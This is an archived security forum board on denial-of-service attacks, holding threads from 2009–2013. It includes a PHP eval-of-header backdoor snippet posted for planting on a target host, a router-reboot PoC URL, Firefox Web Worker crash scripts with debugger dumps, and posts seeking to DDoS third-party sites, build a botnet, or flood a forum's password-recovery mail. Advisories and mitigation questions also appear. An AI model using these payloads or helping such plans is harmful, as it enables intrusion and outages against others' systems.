Web Application Security Forum - DoS

Security In Authentication for Web Applications (no replies)

Endowd — Sun, 05 May 2013 17:17:10 -0500

Hi guys, please i need some assistance in this area. Im doing my Masters and Im researching on this topic above. Iv done some reviews but cant really come up with concrete weaknesses on the related works. Any assistance in terms of what to do differently or enhance the security will be highly appreciated. Thanks

Distributed Denial of Service Prevention Techniques (no replies)

infinity — Wed, 29 Aug 2012 03:20:57 -0500

Distributed Denial of Service Prevention Techniques
B. B. Gupta, R. C. Joshi, Manoj Misra
http://arxiv.org/abs/1208.3557

Quote

This paper presents overview of DDoS problem, available
DDoS attack tools, defense challenges and principles and a
classification of available mechanisms that are proposed in
literature on preventing Internet services from possible DDoS
attacks and discuss the strengths and weaknesses of each
mechanism. A summery of pending concerns draw attention to
core problems in existing mechanisms.

mailto: crash (no replies)

PRSTSC::DTL — Wed, 11 Apr 2012 09:33:47 -0500

Excellent, the mailto: crash crashtest !

the loop stopped at 135 occurrences (XPP SP3, 3.5 Go RAM)
I suceeded to stop the Outlook process with the Windows task Manager.
No reboot :-)

Next time, I will *not* click a link which reads "may crash"...

Cheers to all

Didier
www.dtl-conseil.com

Search,php; memberlist.php; login.php DOS and Gateway Time Out Errors (no replies)

johndoe — Sat, 28 Jan 2012 12:29:35 -0600

Hi guys i was reading about the Gateway time out errors and how they are produced, is it possible to make a request to these php functions and overload a specific website so it would crash and/or freeze?

I was thinking about the following:
1.-making a very big request in those webpages, the logical consecuence will be that the server could not fulfill the request and come to a halt
2.- Use ping command to the especific URL and crash website
3.- Use a script to do it.

Is this possile???

help inserting php script into target hosting @ PHP 5.2.6 sleep() Local Memory Exhaust Exploit (1 reply)

lazer — Wed, 04 Jan 2012 07:43:43 -0600

Hey I want some help in executing this exploit. I'm stuck:(

In reference to exploit described in URL.
1337day.com/exploits/6543

/* put this one on target hosting */
if ( ! $data = @getenv('HTTP_ACCEPT_LANGUAGE'))
$data = $_SERVER['HTTP_ACCEPT_LANGUAGE'];
if ( ! preg_match('#^[a-zA-Z0-9/+]*={0,2}$#', $data))
die('no propety data');
eval(base64_decode($data));
?>

The exploit says to put this in the target hosting. I want to know how can i do this? Don't i have to find an input parameter which takes php codes as input.

Slowloris on IIS (1 reply)

ikramniazi — Sat, 24 Dec 2011 10:29:53 -0600

i have downloaded slowloris and make it run on ubuntu...i ddos some site ...and came to know that it dosent works on IIS ? can anyone tell how could we Ddos IIS ?

Testing Slowloris on Website (2 replies)

ryanyeti — Sat, 24 Dec 2011 10:31:38 -0600

I have just downloaded and tried testing my domain with slowloris to see if I could temperarily shut it down with cmd.Whenever I initiate a connection, my internet always slows way down and even stops working but my website never seems to be clogged up. Any thoughts? I know my server is running apache.

Understanding nigr0 (2 replies)

hereyago — Tue, 20 Jul 2010 01:12:59 -0500

Hello, complete newbie here.

I'm just looking through the nigr0 script code:
http://pastebin.com/YxqkXvQU

I am having trouble understanding what this script actually does. To me it seems like it generates another script that you can DoS with?

Any insights would be great.

protecting against slowloris (2 replies)

cx — Sat, 24 Dec 2011 10:33:19 -0600

Hey,

How do you guys protect against slowloris (Apache 2.2).
There is an Apache module mod_antiloris. Is it stable and OK for production use? What about any drawbacks of using it?
They say it is good idea to use mod_antiloris together with iptables' connlimit.
But there are a lot of ISPs (and other companies) which give many users the same IP address.
Let's say I need to make my site visible to everyone (which doesn't try to DoS me of course ;) ) regardless if they share the same IP with thousand of other users or not...
What is the best protection?
AFAIK mod_security can protect against slowloris attack but i couldn't be able to find rules for it to do so.

Thx,
Mike

F5 key automated through linux command/script? (6 replies)

apasajja — Fri, 28 May 2010 07:23:41 -0500

hello,

im web developer and using various stress tools, including Slowloris and traditional F5 refresh key.

but does anyone know any way to automatically pressing F5 keys very rapidly. it can be linux command or script

thanks in advance.

Firefox 3.6.2 DOS CRASH (1 reply)

malloci — Thu, 25 Mar 2010 16:34:22 -0500

Okay so I have a lame POC (Firefox 3.6.2 Remote Denial of Service Exploit Vulnerability) DOS attack which may be exploitable further? I just wanted to get some feedback and/or ideas from the greater minds available online. Either way if you have time check it out, debug the crash results, and please post any updates or comments. http://cybermediaplanet.com/security/ff3.6/FF3.6-PoC-v1.4.html

Regards,
malloc(i)

Firefox Crypto DOS awkwardness. (no replies)

SAS — Tue, 16 Feb 2010 22:29:26 -0600

Playing around with the tag a couple of minutes and found this. Later on after I posted it on Bugzilla (546308) I found that Thierry Zoller among others had discovered it already a bit earlier (Bug 469565). Practically the same, though in practice different. On first glance it might look an obvious denial of service, one key point has been omitted in the other bug in my opinion. Keys that are generated are stored inside a file called key3.db which also stores signon keys and other crypto stuff FireFox utilizes. Problem is, that file can be stuffed with as many keys as we please. I was able to let it grow from a few KB to a notable 1.44MB (size of a floppy eh?) in matter of minutes. Each key added is about 4KB in size. Now, the larger this key file is, the longer it takes to search and access it. So what if I let it run for hours in a users browser? day after day? maybe through some more clever way than I propose below, that way the key file because enormous in size with the problem that it cannot be edited without affecting stability. If you try and edit it, you will corrupt the profile folder's key3db irretrievable. If you edit it (and I have), SSL keys are LOST TOO. So in essence, once that file is filled with keys, it stays there. I also see no vacuuming of the file, nor is it truncated, or emptied after a series of trials over days. Which seems to imply that it can grow ad infinitum.

Anyway, here is it if you like to try. But remember that it will affect the stability of your browser as explained above.

So while this is fun in some sense, what else can we do? what if the user has a portable laptop with little storage? or what if he uses FireFox portable? or what is he uses a smart phone with limited storage?

wanting to learn... (2 replies)

purple dos — Thu, 07 Jan 2010 07:36:17 -0600

Hello everyone.
I am new to this website, and new to Ddos. I am "newbie" when it comes to Ddos, but I really wish to learn. If there is any "tips" that you can give, it would be really cool.

I know how to read the basics of a lot of codes. So, if there is any further studies I need to go into with Javascript, PhP, C, ect. please let me know.

-What I am really looking to learn-

-make my own botnet
-learn how to fully use a botnet [if there is anyone willing to teach me the basics of a botnet, that would be cool as well] [i do understand what a botnet is, just wanting to learn the insides of it]
-what languages are mainly used to make a botnet.
-ect.

"well if anyone could help me out, it would be much appreciated."

2Wire remote management interface DoS (no replies)

hkm — Sun, 01 Nov 2009 20:21:41 -0600

========================================
2WIRE REMOTE DENIAL OF SERVICE
========================================

Device: 2wire Gateway Router/Modem
Vulnerable Software: < 5.29.52
Vulnerable Models: 1700HG
1701HG
1800HW
2071
2700HG
2701HG-T
Release Date: 2009-09-00
Last Update: 2009-09-00
Critical: Moderately critical
Impact: Denial of service
Remote router reboot
Where: From remote
In the remote management interface
Solution Status: Vendor issued firmware patches
Providers are in charge of applying the patches
WebVuln Advisory: 1-003

BACKGROUND
=======================

The remote management interface of some 2wire modems is enabled by default.
This interface runs over SSL on port 50001 with an untrusted issuer certificate.

++EspaÃ±ol
Algunos mÃ³dems 2wire tienen la interfaz remota habilitada por default.
La interfaz utiliza SSL con un certificado invalido en el puerto 50001.

DESCRIPTION
=======================

Some 2wire modems are vulnerable to a remote denial of service attack.
By requesting a special url from the Remote Management interface, an unathenticated
user can remotely reboot the complete device.

++
Algunos mÃ³dems 2wire son vulnerables a un ataque de denegaciÃ³n de servicio.
Un usuario no autenticado puede reiniciar el dispositivo enviando una peticiÃ³n a
la interfaz de AdministraciÃ³n remota.

EXPLOIT / POC
=======================

https://:50001/xslt?page=%0d%0a

WORKAROUND
=======================

Disable Remote Management in Firewall -> Advanced Settings.

++
Deshabilitar AdministraciÃ³n remota en Cortafuegos -> ConfiguraciÃ³n avanzada

DISCLOSURE TIMELINE
=======================

2009/09/06 - Vulnerability discovered
2009/09/08 - Vendor contacted

REFERENCES
=======================

Preth00nker's exploit (LAN) - http://www.milw0rm.com/exploits/2246
2Wire Gateways CRLF DoS (from local network) - http://secunia.com/advisories/21583
Hakim.Ws - http://www.hakim.ws
WebVuln - http://www.webvuln.com

slowloris vs nginx (4 replies)

lh6lejw7k8 — Tue, 27 Oct 2009 21:43:57 -0500

I've been testing slowloris against nginx to understand the slowloris attack more, and I need help to make sense of it.

From the original thread comments http://ha.ckers.org/blog/20090617/slowloris-http-dos/ it seems that slowloris exhausts _some_ resource specific to the web server, and that for Apache it is max clients.

In my tests against nginx (on a debian machine http://blog.rayfoo.info/2009/10/12/testing-slowloris-against-nginx), nginx seems refuse any incoming connections when its file descriptor count hits the maximum allowed for that process. And during this time it continues to listen (for a while at least) to requests on the connections already established.

I'm not sure yet whether this is purely a kernel/process/linux limitation (I'm thinking ulimit), and this is pretty different in behaviour from how Apache dies from the slowloris attack, but I'd think that nginx is also affected by slowloris because of the nature of this attack (current connections maintained, new connections denied, web server host TCP stack not overloaded)

Anyone has any thoughts on this? Or did I misunderstand the mechanics of the Slowloris?

Guard Page Violation (Firefox 3.5.3) (3 replies)

p0deje — Fri, 25 Sep 2009 09:23:20 -0500

Hello, sla.ckers!
Those who use Firefox 3.5.3 with FoxTab 1.2.1 and Shockwave Flash 10.0.32.18 may see this kind of thing. To reproduce this you need to OPEN firefox.exe from WinDbg - attaching to already running Firefox doesn't show such thing.

(618.974): Guard page violation - code 80000001 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=056c8000 ebx=00000010 ecx=0013eb28 edx=08010000 esi=08010000 edi=0013eb28
eip=051b8d2a esp=0013e900 ebp=00000003 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
NPSWF32!native_ShockwaveFlash_TCallLabel+0xdd9f4:
051b8d2a 881e            mov     byte ptr [esi],bl          ds:0023:08010000=10
0:000> !exploitable
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - Guard Page Violation starting at NPSWF32!native_ShockwaveFlash_TCallLabel+0x00000000000dd9f4 (Hash=0x00000000.0x00000007)

I'm not quite sure about, cause I only could test it on my machine (Windows XP Pro SP2). But, as far as it is exploitable, what can you say about it?

Does this code crash your Firefox? (no replies)

malloci — Thu, 24 Sep 2009 15:54:07 -0500

Couldn't help it... just had to add a third thread with the same name. Hey, at least I didn't copy my code line for line from the other posts (just my own post).

Either way, I am fairly sure this code will crash your Firefox3.5 browser.

This is just one version of the PoC I have been coding. It is ugly code but should serve as an example to use for debugginf FF3.5. Hope to get some feedback (crashes, debug, comments, ideas).

-------------------------------------
index.html
-------------------------------------

DOS

Please Wait, while I CRASH your Browser; it should not take long :)...

-----------------------------------------------------------
workCRASH.js
--------------------------------------------

onmessage = function(event){

var worker = new Worker("workCRASH.js");
worker.onmessage = function(event)
{
var worker = new Worker("workCRASH-Test.js");
worker.onmessage = function(event)
{
worker.postMessage(event.data.concat(event.data));
CollectGarbage();
postMessage(event.data.concat(event.data));
CollectGarbage();
};
worker.postMessage(event.data.concat(event.data));
postMessage(event.data.concat(event.data));
};

worker.postMessage(event.data.concat(event.data));
postMessage(event.data.concat(event.data));

}

-------------------------------------
workCRASH-Test.js
------------------------------------

onmessage = function(event){

var worker = new Worker("workCRASH-Test.js");
worker.onmessage = function(event)
{
//var nop = unescape("\x90\x90\x90\x90");

var str1 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
var str2 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";

worker.postMessage(event.data.concat(str1+str2));
postMessage(event.data.concat(str1+str2));
};

worker.postMessage(event.data.concat(event.data));
postMessage(event.data);

}

____________________________________

The code is a mess right now... I have been fuzzing it with diffrent input. Give it a go and let me know if it crashes your FF3.5 browser. If you have any time to debug the crash please post some output.

You might have to run the code a few times to get it to crash on a diffrent place then the xul!XPCNativeSet::Mark: error. Like I said I have not had to much time to work on the code, it is mostly a jumbled mess right now. I still am trying to find out how I can overwrite the registers.

malloc(i)

DoS by Regex or reDoS (2 replies)

Alex Roichman — Sat, 12 Sep 2009 07:50:58 -0500

Alex Roichman and Adar Weidman form Checkmarx found a new attack vector on Web Applications. By exploiting the Regular Expression Denial of Service (ReDoS) vulnerability an attacker can make a Web application unavailable to its intended users. ReDoS is commonly known as a "bug" in systems, but Alex Roichman and Adar Weidman show how serious it is and how using this technique, various applications can be "ReDoSed". These include, among others, Server-side of Web applications and Client-side Browsers. The art of attacking the Web by ReDoS is by finding inputs which cannot be matched by Regexes and on these Regexes a Regex-based Web systems get stuck.

For further reading:
http://www.checkmarx.com/NewsDetails.aspx?id=23

Firefox 3.5 JS Web Worker DoS - Debug Help (19 replies)

malloci — Thu, 29 Oct 2009 14:26:43 -0500

Hello Sla.ckers,

This is my first post so please take it easy on me, I'm still learning. I have a question regarding debugging firefox. I have loaded the symbols from the symbol server and have some debug output; however, I am not sure what I am looking at. I am curious if this code might lead to a possible exploit? I have read a little on the recent heap spray and buffer overflow exploits on firefox and was thinking this might be along those lines. Once again I am a newbie, so if you could point me in the right direction to research I would appreciate it. My code:

index.html
-------------------------------------------

DOS

Please Wait, while I CRASH your Browser; it should not take long :)...

workCRASH.js
-------------------------------------------------
onmessage = function(event){

var worker = new Worker("workCRASH.js");
worker.onmessage = function(event)
{
worker.postMessage(event.data.concat(event.data));
postMessage(event.data.concat(event.data));
};
worker.postMessage(event.data.concat(event.data));
postMessage(event.data.concat(event.data));

}

WinDbg Debug
-------------------------------------------
(1380.1234): Break instruction exception - code 80000003 (first chance)
ntdll!DbgBreakPoint:
00000000`77874ea0 cc int 3
0:018> g
(1380.1574): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
xul!XPCNativeSet::Mark:
00000000`70f978e6 0fb74602 movzx eax,word ptr [esi+2] ds:002b:00000000`00000006=????

------------ Disassembly -------------------------------
xul!XPCNativeSet::Mark:
572 xpcinlines.h 00000000`70f978e6 0fb74602 movzx eax,word ptr [esi+2] ds:002b:00000000`00000006=????
573 xpcinlines.h 00000000`70f978ea 6685c0 test ax,ax

---------- VS Debug --------------

--- e:\builds\moz2_slave\win32_build\build\obj-firefox\dist\include\xpcom\nscomptr.h
64C578C2 56 push esi
64C578C3 8B F1 mov esi,ecx
64C578C5 8B 06 mov eax,dword ptr [esi]
64C578C7 83 26 00 and dword ptr [esi],0
64C578CA 85 C0 test eax,eax
64C578CC 74 06 je nsCOMPtr::StartAssignment+12h (64C578D4h)
64C578CE 8B 08 mov ecx,dword ptr [eax]
64C578D0 50 push eax
64C578D1 FF 51 08 call dword ptr [ecx+8]
64C578D4 8B C6 mov eax,esi
64C578D6 5E pop esi
64C578D7 C3 ret
64C578D8 56 push esi
64C578D9 6A 00 push 0
64C578DB 8B F1 mov esi,ecx
64C578DD E8 DE C6 E5 FF call nsCOMPtr_base::nsCOMPtr_base (64AB3FC0h)
64C578E2 8B C6 mov eax,esi
64C578E4 5E pop esi
64C578E5 C3 ret
--- e:\builds\moz2_slave\win32_build\build\js\src\xpconnect\src\xpcinlines.h ---
64C578E6 0F B7 46 02 movzx eax,word ptr [esi+2]
64C578EA 66 85 C0 test ax,ax
64C578ED 78 1E js XPCNativeSet::Mark+27h (64C5790Dh)
64C578EF 8D 56 04 lea edx,[esi+4]
64C578F2 0F B7 C8 movzx ecx,ax
64C578F5 EB 0C jmp XPCNativeSet::Mark+1Dh (64C57903h)
64C578F7 8B 02 mov eax,dword ptr [edx]
64C578F9 66 81 48 08 00 80 or word ptr [eax+8],8000h

The thread 'Win32 Thread' (0x17b4) has exited with code 0 (0x0).
Unhandled exception at 0x64c578e6 (xul.dll) in firefox.exe: 0xC0000005: Access violation reading location 0x00000006.
First-chance exception at 0x64c578e6 (xul.dll) in firefox.exe: 0xC0000005: Access violation reading location 0x00000006.

Sorry for the long post... Just trying to learn here.

Thanks for the help and input.

Malloc(i)

Does this code crash your Firefox? (6 replies)

Pavlovrm — Sat, 29 Aug 2009 22:36:48 -0500

I write a code; but for me work, for the pc of my friend no: why?

tested on : WinXP Sp2 + Mozilla FIreFox 3.5.2 <= WORK

tested on: WinXP sp3 + MOzilla FIrefox 3.5 <= not work

it's true>? test by yuorself

code:

[~] bUt Work? MOzilla Firefox 3.5.2 <= (char) Buffer Overflow crash exploit

Only For fun..

@ XaDoS August ~ 2009

Does this code crash your Firefox? (4 replies)

XaDoS — Wed, 19 Aug 2009 14:10:15 -0500

Cycled XMLHttpRequest bug (4 replies)

p0dge — Mon, 03 Aug 2009 04:23:38 -0500

I've found a bug with cycled asynchronous XMLHttp in different browsers. If you create html page with following code

and open it, you will see how different browsers begin to devour system resources.

- Internet Explorer 7/8 shows a message "Stack overflow at line:23" and stop page loading
- Firefox 3.5 and Chrome handles this correctly
- Opera 10 crashes
- Apple Safari hangs

I'm not strong in browsers vulnerabilities so I want to know if this is a simple crash bug or it's Buffer Overflow which allows to run shell code

Forum DoS I thought up (2 replies)

flam — Tue, 14 Jul 2009 16:31:08 -0500

One day while I had forgotten my password to a forum, I realized that many forums allow password recovery through email very easily (no captcha). I was thinking, what if I wrote a POST script to send email recovery emails as fast as possible... The server's mail service might clog up (maybe, I have no idea), but more importantly, after a while, the hosting company will suspend the forum's account for being "spamers".
To add some pizazz to this you can make an array of all the member names or emails and send password recovery to each one of them. Gmail merges emails from the same recipient into one conversation, but I'm sure other mail services/clients would easily be spammed by this.

I'll post some code later if I get any free time.

Iran - firewalls - government ip collection - Dos attacks - RSnake (4 replies)

irie — Mon, 13 Jul 2009 10:16:42 -0500

I don't write politely I write fast, or I try to.

slowloris is a program to initiate a sophisticated DoS attack using low bandwidth, intensive job scheduling to keep a server busy.

It is being used by hackers (or just computer savvy activists) against Iranian government websites that, for example, display pictures of protestors and ask for anonymous information about their identity. To be used by government forces for arrests or who knows what.

One such group of computer hacky activists, which has been making use of slowloris and pyloris, is called anonymous/whyweprotest. They're "causes" are plural and probably irritating to some (certainly to me).
However those causes include what seems a noble effort to protect iranian protestors by using slowloris as mentioned.

Just for reference, I give the two relevant links:

http://ha.ckers.org/blog/20090617/slowloris-http-dos/

http://iran.whyweprotest.net/keeping-your-anonymity-iran/2214-iranian-web-site-identifies-protesters.html

Just FYI.

Javascript threads (FF3.5) (1 reply)

backbone — Mon, 13 Jul 2009 10:17:58 -0500

I'm rather astounded that nobody mentioned the javascript threading which can be achieved with Firefox 3.5...

I've conducted an experiment to test the DoSness of them, but it's rather inconclusive. I've managed to crash Firefox in a couple of instances, only when executing other activities in parallel with the thread "bomber"... as mentioned it didn't always work...

Of course the memory usage skyrockets, and the CPU is always in the 98% (90% after closing the tab with the PoC as well), but I can't seem to make Firefox execute a seppuku move at will.

Maybe fellow slackers will have a go at it, and find a way to maximize the memory usage for an instant pop :).

The code I've used:
index.html



    ninja-thread

work.js

onmessage = function(event) {
    abc = [];
    for(i=0;i<100;i++) {
        abc = new Worker('work.js');
        abc.onmessage = function(event) {
            postMessage(event.data);
        }
        abc.postMessage(event.data+1);
    }
    postMessage(event.data+1)
}

Newbie alert - What can a hacker find from an uploaded file? (5 replies)

JonW215 — Fri, 10 Jul 2009 09:48:42 -0500

Hi guys!

I'm a total newbie to the whole web hacking situation!
I'm writing an IIS based webapp, which will enable primary schools in the UK to upload and analyse pupil (student) performance throughout the year.
Initially I would like to try to set this up with using SSL, really just to enable a couple of schools to trial it while I tweak the app etc.

Anyhow, my question is, if a hacker was to intercept one of the plain text files being uploaded, what other info could they potentially find during the 'interception'.

The actual text file itself would only hold things such as:
an ID for the student which is internal to the school
the pupil's name
the subject (Maths etc)
The grade/level acheived

Just to provide a little more info, the user will have already logged in prior to uploading the file. Their username and a 20-digit 'security code' assigned during login are stored in a cookie, as well as that same info stored in a server side token. Use of the different pages of the application are only allowed if the cookie info matches the server token and this information isn't sent during the upload process (or at least, not intentionally).

I guess what I'm asking is, if a hacker intercepted this text file, would they automatically be privvy to other information like the cookie/token?

I'm making the assumption at this point that the hacker hasn't directly targetted the web server, but has somehow simply intercepted the text file being uploaded.

Again, I will point out I am a total newbie to hacking processes and capabilities and would really appreciate any guidance given. If you need more info then I'll try to supply it.

Thanks in advance - I'll go back to reading all these very interesting posts!

J

new type of ddos? (3 replies)

SpoofGhost — Fri, 08 May 2009 16:51:36 -0500

hi there ;)..

i was thinking about a new dos/ddos type..
as there are many site that have an login system that when you enter
the wrong password like 3 to xxx times you can't login for xxx minuts/hours/days.

anyway you get my point.. well then if there is a hole/bug on a public place where you can input precisting xss the best place would be the home pages

you can generate wrong login sessions for every visitor. so if some one want to login it says to manny tries. anyway that way you can dissable there service
as every service wich requers login is started with logging in so everything malfunctions.

ofc this sould be examen.

anyway actually my question is what do you guys think of this?

Adobe Dreamweaver CS3 Denial of Service (no replies)

Ivan — Thu, 23 Apr 2009 09:42:22 -0500

|| Security Net Advisory #D.02.20.09.a

Title : Adobe Dreamweaver CS3 Denial of Service
Impact : DoS
Type : From remote
Vendor :
- Url : http://www.adobe.com/

|| Vulnerability

Engine for parsing remote CSS files are vulnerable to DoS attacks. Successful exploatation requires from user to include special .css file from remote web site.

|| POC

--- tmpl01.dwbug.php ---

------------------------------

File test.css must begin with hex value: 0a, for successful exploatation.

|| Solution:

Upgrade to newest version.

|| Contact

Author : Ivan Markovic, Network Security Solutions
Original advisory: http://security-net.biz/wsw/index.php?p=259&n=190

File Upload issue (9 replies)

gunwant_s — Tue, 21 Apr 2009 11:24:33 -0500

Hi,

I was sizing up one of the very underestimated risk associated with the 'upload' feature in applications of different platforms. To elucidate, let me give you an example:

An application has an upload feature which allows files no bigger than 2MB. Now if you try to upload a file bigger than that, it will exhibit a message saying 'not allowed to upload big files'. Now if you analyze the server carefully, you will see the whole file gets uploaded to the Temporary folder first and then it will check if it is bigger than 2 MB. Following that if a malicious user automate this process and submit multiple requests (in thousands or more), that can be a possible cause of DoS as the server space will be occupied.

My question is how to mitigate this. Any thoughts?

ddosing with xss? (13 replies)

SpoofGhost — Sat, 11 Apr 2009 06:08:10 -0500

hi there just a quick quistion wich concerns also xss

well if you got an xss bug like when u post your code on a guestbook so that if some one visit that page it will fire your code is it possible to create a ddos attack with this like a bot net?

as an example i post some code on a guest book with an iframe wich loads a pecific site in it without the visitor in quistion you actually send data to that server so if you do this with loads of people that visit that guest book

is it possible to take down a site or so?